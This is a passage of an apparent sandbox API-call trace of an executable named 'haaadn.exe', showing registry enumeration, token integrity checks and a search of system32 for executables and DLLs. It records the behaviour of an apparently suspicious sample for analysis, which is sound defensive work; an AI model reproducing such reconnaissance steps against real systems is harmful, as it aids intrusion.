0x439da0 [0027.678] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0027.678] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0027.678] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0027.678] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0027.678] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0027.678] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0027.678] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0027.678] RegEnumKeyW (in: hKey=0x98, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0027.678] lstrlenW (lpString="MediaInterfaces") returned 15 [0027.678] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439dc0 [0027.678] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0027.678] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0027.678] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0027.678] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0027.678] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0027.678] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0027.678] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x439dc0 | out: hHeap=0x420000) returned 1 [0027.678] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x22) returned 0x43a4c8 [0027.678] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0027.678] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0027.679] RegEnumKeyW (in: hKey=0x98, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0027.679] lstrlenW (lpString="MediaProperties") returned 15 [0027.679] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439dc0 [0027.679] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0027.679] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0027.679] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0027.679] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0027.679] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0027.679] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0027.679] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x439dc0 | out: hHeap=0x420000) returned 1 [0027.679] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x22) returned 0x43a4f8 [0027.679] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0027.679] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0027.679] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0027.679] RegEnumKeyW (in: hKey=0x98, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0027.679] lstrlenW (lpString="MediaTypes") returned 10 [0027.679] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439dc0 [0027.679] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0027.679] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0027.679] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0027.679] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0027.679] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0027.679] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0027.679] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x439dc0 | out: hHeap=0x420000) returned 1 [0027.679] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439dc0 [0027.679] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0027.679] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0027.679] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0027.679] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0027.679] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0027.679] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0027.679] RegEnumKeyW (in: hKey=0x98, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0027.679] lstrlenW (lpString="MobilePC") returned 8 [0027.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x434450 [0027.680] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0027.680] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0027.680] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0027.680] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0027.680] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0027.680] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0027.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x12) returned 0x439de0 [0027.680] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0027.680] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0027.680] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0027.680] RegEnumKeyW (in: hKey=0x98, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0027.680] lstrlenW (lpString="MPDEV") returned 5 [0027.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439e00 [0027.680] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0027.680] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0027.680] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0027.680] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0027.680] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0027.680] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0027.680] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0027.680] RegEnumKeyW (in: hKey=0x98, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0027.680] lstrlenW (lpString="MSDTC") returned 5 [0027.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439e20 [0027.680] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0027.680] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0027.680] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0027.680] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0027.680] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0027.680] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0027.680] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0027.681] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0027.681] RegEnumKeyW (in: hKey=0x98, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0027.681] lstrlenW (lpString="MUI") returned 3 [0027.681] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439e40 [0027.681] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0027.681] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0027.681] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0027.681] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0027.681] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0027.681] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0027.681] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0027.681] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0027.681] RegEnumKeyW (in: hKey=0x98, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0027.681] lstrlenW (lpString="NetDiagFx") returned 9 [0027.681] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439e60 [0027.681] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0027.681] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0027.681] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0027.681] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0027.681] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0027.681] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0027.681] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0027.681] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0027.681] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0027.681] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x439e80 [0027.681] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0027.681] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0027.681] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0027.681] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0027.681] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x12) returned 0x439ea0 [0027.681] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0027.681] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0027.681] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0027.681] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0027.682] RegEnumKeyW (in: hKey=0x98, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0027.682] lstrlenW (lpString="NetTrace") returned 8 [0027.682] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439ec0 [0027.682] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0027.682] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0027.682] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0027.682] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0027.682] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0027.682] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0027.682] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0027.682] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0027.682] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0027.682] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0027.682] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x439ec0 | out: hHeap=0x420000) returned 1 [0027.682] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439ec0 [0027.682] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0027.682] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0027.682] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0027.682] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0027.682] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0027.682] RegEnumKeyW (in: hKey=0x98, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0027.682] lstrlenW (lpString="Network") returned 7 [0027.682] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x43a540 [0027.682] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0027.682] lstrlenW (lpString="NetworkProvider") returned 15 [0027.682] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x43a568 [0027.683] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0027.683] lstrlenW (lpString="Nls") returned 3 [0027.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439ee0 [0027.683] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0027.683] lstrlenW (lpString="NodeInterfaces") returned 14 [0027.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x439f00 [0027.683] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0027.683] lstrlenW (lpString="Nsi") returned 3 [0027.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439f20 [0027.683] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0027.683] lstrlenW (lpString="PCW") returned 3 [0027.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439f40 [0027.683] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0027.683] lstrlenW (lpString="PnP") returned 3 [0027.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x12) returned 0x439f60 [0027.683] RegEnumKeyW (in: hKey=0x98, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0027.683] lstrlenW (lpString="Power") returned 5 [0027.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439f80 [0027.683] RegEnumKeyW (in: hKey=0x98, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0027.683] lstrlenW (lpString="Print") returned 5 [0027.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439fa0 [0027.683] RegEnumKeyW (in: hKey=0x98, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0027.684] lstrlenW (lpString="PriorityControl") returned 15 [0027.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x43a590 [0027.684] RegEnumKeyW (in: hKey=0x98, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0027.684] lstrlenW (lpString="ProductOptions") returned 14 [0027.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x43a5b8 [0027.684] RegEnumKeyW (in: hKey=0x98, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0027.684] lstrlenW (lpString="Remote Assistance") returned 17 [0027.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x43a608 [0027.684] RegEnumKeyW (in: hKey=0x98, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0027.684] lstrlenW (lpString="SafeBoot") returned 8 [0027.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x439fc0 [0027.684] RegEnumKeyW (in: hKey=0x98, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0027.684] lstrlenW (lpString="ScsiPort") returned 8 [0027.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x43a000 [0027.684] RegEnumKeyW (in: hKey=0x98, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0027.684] lstrlenW (lpString="SecurePipeServers") returned 17 [0027.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x43a630 [0027.684] RegEnumKeyW (in: hKey=0x98, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0027.684] lstrlenW (lpString="SecurityProviders") returned 17 [0027.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x43a680 [0027.684] RegEnumKeyW (in: hKey=0x98, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0027.684] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0027.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x43a6d0 [0027.685] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0027.685] lstrlenW (lpString="ServiceProvider") returned 15 [0027.685] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x43a6f8 [0027.685] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0027.685] lstrlenW (lpString="Session Manager") returned 15 [0027.685] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x43a6f8 [0027.685] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0027.685] lstrlenW (lpString="SNMP") returned 4 [0027.685] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x43a060 [0027.685] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0027.685] lstrlenW (lpString="SQMServiceList") returned 14 [0027.685] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x22) returned 0x43ad58 [0027.685] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0027.685] lstrlenW (lpString="Srp") returned 3 [0027.685] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x43a080 [0027.685] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0027.685] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0027.685] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x43a0a0 [0027.685] RegEnumKeyW (in: hKey=0x98, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0027.685] lstrlenW (lpString="StillImage") returned 10 [0027.685] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x43a0a0 [0027.685] RegEnumKeyW (in: hKey=0x98, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0027.685] lstrlenW (lpString="Storage") returned 7 [0027.685] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x43a748 [0027.686] RegEnumKeyW (in: hKey=0x98, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0027.686] lstrlenW (lpString="SystemResources") returned 15 [0027.686] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x43a770 [0027.686] RegEnumKeyW (in: hKey=0x98, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0027.686] lstrlenW (lpString="TabletPC") returned 8 [0027.686] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x43a798 [0027.686] RegEnumKeyW (in: hKey=0x98, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0027.686] lstrlenW (lpString="Terminal Server") returned 15 [0027.686] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x43a7c0 [0027.686] RegEnumKeyW (in: hKey=0x98, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0027.686] lstrlenW (lpString="TimeZoneInformation") returned 19 [0027.686] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x43a0e0 [0027.686] RegEnumKeyW (in: hKey=0x98, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0027.686] lstrlenW (lpString="usbflags") returned 8 [0027.686] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x43a810 [0027.687] RegEnumKeyW (in: hKey=0x98, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0027.687] lstrlenW (lpString="usbstor") returned 7 [0027.687] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x43a838 [0027.687] RegEnumKeyW (in: hKey=0x98, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0027.687] lstrlenW (lpString="VAN") returned 3 [0027.687] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x43a120 [0027.687] RegEnumKeyW (in: hKey=0x98, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0027.687] lstrlenW (lpString="Video") returned 5 [0027.687] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x43a140 [0027.687] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0027.687] lstrlenW (lpString="wcncsvc") returned 7 [0027.687] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x43a860 [0027.687] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0027.687] lstrlenW (lpString="Wdf") returned 3 [0027.687] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x43a160 [0027.687] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0027.687] lstrlenW (lpString="WDI") returned 3 [0027.687] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x43a180 [0027.687] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0027.687] lstrlenW (lpString="Windows") returned 7 [0027.687] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x43a888 [0027.687] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0027.687] lstrlenW (lpString="Winlogon") returned 8 [0027.687] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x43a8b0 [0027.688] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0027.688] lstrlenW (lpString="WMI") returned 3 [0027.688] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x43a1a0 [0027.688] RegEnumKeyW (in: hKey=0x98, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0027.688] lstrlenW (lpString="hivelist") returned 8 [0027.688] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x43a8d8 [0027.688] RegEnumKeyW (in: hKey=0x98, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0027.688] lstrlenW (lpString="SystemInformation") returned 17 [0027.688] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x43a900 [0027.688] RegEnumKeyW (in: hKey=0x98, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0027.688] lstrlenW (lpString="Winresume") returned 9 [0027.688] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x20) returned 0x43a900 [0027.688] RegEnumKeyW (in: hKey=0x98, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0027.688] RegCloseKey (hKey=0x98) returned 0x0 [0027.688] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\haaadn.exe\" " [0027.688] StrChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\haaadn.exe\" ", wMatch=0x22) returned="\" " [0027.688] StrChrW (lpStart="\" ", wMatch=0x20) returned=" " [0027.688] StrTrimW (in: psz="", pszTrimChars=" " | out: psz="") returned 0 [0027.688] GetVersion () returned 0x1db10106 [0027.688] GetCurrentProcess () returned 0xffffffff [0027.688] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff24 | out: TokenHandle=0x18ff24*=0x98) returned 1 [0027.688] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x14, TokenInformation=0x18ff1c, TokenInformationLength=0x4, ReturnLength=0x18ff28 | out: TokenInformation=0x18ff1c, ReturnLength=0x18ff28) returned 1 [0027.688] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff28 | out: TokenInformation=0x0, ReturnLength=0x18ff28) returned 0 [0027.688] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x43a1c0 [0027.689] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x43a1c0, TokenInformationLength=0x14, ReturnLength=0x18ff28 | out: TokenInformation=0x43a1c0, ReturnLength=0x18ff28) returned 1 [0027.689] GetSidSubAuthorityCount (pSid=0x43a1c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x43a1c9 [0027.689] GetSidSubAuthority (pSid=0x43a1c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x43a1d0 [0027.689] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43a1c0 | out: hHeap=0x420000) returned 1 [0027.689] CloseHandle (hObject=0x98) returned 1 [0027.689] CommandLineToArgvW (in: lpCmdLine="", pNumArgs=0x18ff64 | out: pNumArgs=0x18ff64) returned 0x43ad88*="C:\\Users\\5p5NrGJn0jS" [0027.689] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff1c | out: lpSystemTimeAsFileTime=0x18ff1c*(dwLowDateTime=0xb58d9840, dwHighDateTime=0x1d64ac6)) [0027.689] GetWindowsDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0xb [0027.689] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x220) returned 0x43ae00 [0027.689] GetWindowsDirectoryW (in: lpBuffer=0x43ae00, uSize=0xc | out: lpBuffer="C:\\Windows") returned 0xa [0027.689] lstrcpyW (in: lpString1=0x43ae16, lpString2="system32" | out: lpString1="system32") returned="system32" [0027.689] lstrlenW (lpString="C:\\Windows\\system32") returned 19 [0027.689] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xfffe) returned 0x43b028 [0027.690] lstrlenW (lpString="*.exe|*.dll") returned 11 [0027.690] lstrlenW (lpString=0x0) returned 0 [0027.690] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x43a928 [0027.690] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x250) returned 0x44b030 [0027.690] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\*", lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44b288 [0027.690] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0027.690] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0409", cAlternateFileName="")) returned 1 [0027.690] lstrlenW (lpString="0409") returned 4 